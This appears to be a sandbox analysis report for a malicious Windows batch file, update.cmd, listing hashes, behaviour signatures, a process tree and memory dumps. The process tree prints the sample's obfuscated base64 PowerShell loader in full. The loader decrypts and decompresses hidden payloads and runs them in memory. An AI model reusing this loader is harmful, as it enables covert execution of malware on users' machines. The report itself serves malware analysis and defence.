60d1e55a7d30437b3763f34ec2fad55fc02d92a93d54c64a9972dfe0dd019826

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-11-2024 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.cmd
Size

60KB
MD5

25821577dc3c4fb26ad9459e6ea11c30
SHA1

c0ee3c0991cfddc2a1f0c7b339da2c23624783fe
SHA256

60d1e55a7d30437b3763f34ec2fad55fc02d92a93d54c64a9972dfe0dd019826
SHA512

02f0baf1f78ad6ce4f75742e27a3e33cf9d52d184fcb6837d95f8e1a94ff08dad448122a6e71a68b4bfa0f05abf18fb4a159bc531d9f777afd34b285178d84c1
SSDEEP

1536:0RmcRy63BbIxxrQSAQz9mu45kjqrNM3zLX20SiJUmstIDsc9a8K7Jm:0RjVBQ5A49QrrNuzLXMiJU5tIDpgj7U

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1168	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1168	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 1532	1744	cmd.exe	31
PID 1744 wrote to memory of 1532	1744	cmd.exe	31
PID 1744 wrote to memory of 1532	1744	cmd.exe	31
PID 1744 wrote to memory of 1432	1744	cmd.exe	32
PID 1744 wrote to memory of 1432	1744	cmd.exe	32
PID 1744 wrote to memory of 1432	1744	cmd.exe	32
PID 1432 wrote to memory of 1680	1432	cmd.exe	34
PID 1432 wrote to memory of 1680	1432	cmd.exe	34
PID 1432 wrote to memory of 1680	1432	cmd.exe	34
PID 1432 wrote to memory of 1624	1432	cmd.exe	35
PID 1432 wrote to memory of 1624	1432	cmd.exe	35
PID 1432 wrote to memory of 1624	1432	cmd.exe	35
PID 1432 wrote to memory of 1168	1432	cmd.exe	36
PID 1432 wrote to memory of 1168	1432	cmd.exe	36
PID 1432 wrote to memory of 1168	1432	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\update.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\system32\cmd.exe
  cmd /c "set __=^&rem"
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\update.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Windows\system32\cmd.exe
    cmd /c "set __=^&rem"
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\update.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gT01Ca0UoJERsWmlzKXskUGJYVVU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFBiWFVVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskUGJYVVUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRQYlhVVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNGxqKzRqS3htcXpxUHVoeHZWMnBveDhOb3VoK2N3OHh3aWsxT0hiSDY4MD0nKTskUGJYVVUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnam5VQjUzd2lPWEhKRHRMR2dmMTc5dz09Jyk7JFhTS3FRPSRQYlhVVS5DcmVhdGVEZWNyeXB0b3IoKTskU0pMdGc9JFhTS3FRLlRyYW5zZm9ybUZpbmFsQmxvY2soJERsWmlzLDAsJERsWmlzLkxlbmd0aCk7JFhTS3FRLkRpc3Bvc2UoKTskUGJYVVUuRGlzcG9zZSgpOyRTSkx0Zzt9ZnVuY3Rpb24gZUtTVGsoJERsWmlzKXskcmZWUU09TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkRGxaaXMpOyR1WnlOVT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFVZUkdKPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJHJmVlFNLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskVVlSR0ouQ29weVRvKCR1WnlOVSk7JFVZUkdKLkRpc3Bvc2UoKTskcmZWUU0uRGlzcG9zZSgpOyR1WnlOVS5EaXNwb3NlKCk7JHVaeU5VLlRvQXJyYXkoKTt9JHBuYm5JPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskTVdsY0M9ZUtTVGsgKE9NQmtFIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJHBuYm5JLCA1KS5TdWJzdHJpbmcoMikpKSk7JHpVYkFwPWVLU1RrIChPTUJrRSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRwbmJuSSwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kelViQXApLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJE1XbGNDKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
    3⤵
    PID:1624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1168

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1168-4-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

Filesize
4KB

Download
memory/1168-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/1168-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/1168-7-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/1168-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/1168-9-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp

Filesize
4KB

Download